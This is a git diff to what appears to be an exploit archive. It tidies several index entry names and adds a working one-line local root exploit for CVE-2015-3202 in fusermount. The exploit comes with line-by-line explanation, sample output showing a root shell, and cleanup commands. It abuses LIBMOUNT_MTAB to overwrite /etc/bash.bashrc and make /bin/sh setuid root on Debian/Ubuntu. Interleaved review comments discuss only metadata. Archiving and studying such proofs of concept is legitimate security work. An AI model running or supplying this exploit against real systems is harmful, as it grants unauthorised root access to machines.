diff --git a/files.csv b/files.csv
index 85dfc377a..d4eede4c4 100755
--- a/files.csv
+++ b/files.csv
@@ -17687,7 +17687,7 @@ id,file,description,date,author,platform,type,port
 20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
-20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
+20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
@@ -21865,7 +21865,7 @@ id,file,description,date,author,platform,type,port
 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0
 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0
 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0
-24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
+24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0
 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
 24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0
@@ -23681,8 +23681,8 @@ id,file,description,date,author,platform,type,port
 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0
 26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0
 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0
-26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
-26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
+26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
+26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0
 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0
 26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0
@@ -27061,7 +27061,7 @@ id,file,description,date,author,platform,type,port
 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
-29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
+29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
@@ -33152,7 +33152,7 @@ id,file,description,date,author,platform,type,port
 36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
 36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
-36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
@@ -33471,3 +33471,4 @@ id,file,description,date,author,platform,type,port
 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
+37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
diff --git a/platforms/linux/local/37089.txt b/platforms/linux/local/37089.txt
new file mode 100755
index 000000000..3fe67c403
--- /dev/null
+++ b/platforms/linux/local/37089.txt
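Review bot: The row added in the second hunk of this span, `+37089,...,"Fuse - Local Privilege Escalation",...`, names neither a component version nor the vulnerability identifier, while the neighbouring entries and the rows renamed elsewhere in this commit carry at least a version (`OTRS 2.0.4`, `TeamPass 2.1.5`), so this entry cannot be matched against an advisory or scanner feed from the index alone. The new file itself tags the issue as CVE-2015-3202 in its command comment, so the identifier is available to the catalogue. Suggest `37089,platforms/linux/local/37089.txt,"Fuse (fusermount) - Local Privilege Escalation (CVE-2015-3202)",2015-05-23,"Tavis Ormandy",linux,local,0`, subject to whatever this index's convention for CVE ids in the description column is, which I cannot tell from this hunk.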
@@ -0,0 +1,98 @@
+Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba
+Tweet: https://twitter.com/taviso/status/601370527437967360
+
+
+
+# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
+
+12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+
+# Here's how it works, $a holds the name of a shellscript to be executed as
+# root.
+a=/tmp/.$$;
+
+# $b is used twice, first to build the contents of shellscript $a, and then as
+# a command to make $a executable. Quotes are unused to save a character, so
+# the seperator must be escaped.
+b=chmod\ u+sx;
+
+# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
+# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
+# and dont make it drop privileges.
+#
+# http://www.openwall.com/lists/oss-security/2013/08/22/12
+#
+echo $b /bin/sh>$a;
+
+# Now make the $a script executable using the command in $b. This needlessly
+# sets the setuid bit, but that doesn't do any harm.
+$b $a;
+
+# Now make $a the directory we want fusermount to use. This directory name is
+# written to an arbitrary file as part of the vulnerability, so needs to be
+# formed such that it's a valid shell command.
+a+=\;$a;
+
+# Create the mount point for fusermount.
+mkdir -p $a;
+
+# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
+# /bin/mount so that it can use privileged mount options that are normally
+# restricted if ruid != euid. That's acceptable (but scary) in theory, because
+# fusermount can sanitize the call to make sure it's safe.
+#
+# However, because mount thinks it's being invoked by root, it allows
+# access to debugging features via the environment that would not normally be
+# safe for unprivileged users and fusermount doesn't sanitize them.
+#
+# Therefore, the bug is that the environment is not cleared when calling mount
+# with ruid=0. One debugging feature available is changing the location of
+# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
+# files.
+#
+# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
+# current shell from $0...so it only works if you're using bash!).
+#
+# The line written by fusermount will look like this:
+#
+# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
+#
+# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
+# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
+# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
+# next time root logs in.
+#
+# Another way to exploit it would be overwriting /etc/default/locale, then
+# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
+# wouldn't have to log in, but you would have to wait around until midnight to
+# check if it worked.
+#
+# And we have enough characters left for a hash tag/comment.
+LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+
+# Here is how the exploit looks when you run it:
+#
+# $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+# fusermount: failed to open /etc/fuse.conf: Permission denied
+# sending file descriptor: Socket operation on non-socket
+# $ cat /etc/bash.bashrc
+# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0
+#
+# Now when root logs in next...
+# $ sudo -s
+# bash: /dev/fuse: Permission denied
+# # ls -Ll /bin/sh
+# -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh
+# # exit
+# $ sh -c 'id'
+# euid=0(root) groups=0(root)
+#
+# To repair the damage after testing, do this:
+#
+# $ sudo rm /etc/bash.bashrc
+# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash
+# $ sudo chmod 0755 /bin/sh
+# $ sudo umount /tmp/.$$\;/tmp/.$$
+# $ rm -rf /tmp/.$$ /tmp/.$$\;
+#
\ No newline at end of file
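Review bot: The writeup states the root cause itself (`the bug is that the environment is not cleared when calling mount with ruid=0`, with `LIBMOUNT_MTAB` redirecting the mtab write), yet the file header records only the `Source:` and `Tweet:` links, with no affected/fixed-version line or vendor reference, so anyone triaging this entry must follow the external links to learn which fusermount builds are exposed and what the remediation is. Suggest two header lines after `Tweet:`, `Affected: <fuse versions — fill in from the upstream advisory>` and `Fix: fusermount must sanitize the environment (at least LIBMOUNT_MTAB) before invoking mount with ruid=0`, plus a comment above the digit line such as `# 140-character ruler for the tweet-length constraint` so it is not mistaken for part of the payload. The `Fix:` wording is inferred from the file's own description of the defect rather than from the upstream change, so confirm it against the fuse fix before recording it. The file also ends on a bare `#` comment line with no terminating newline (the `\ No newline at end of file` marker); terminate the file so later diffs of it stay clean.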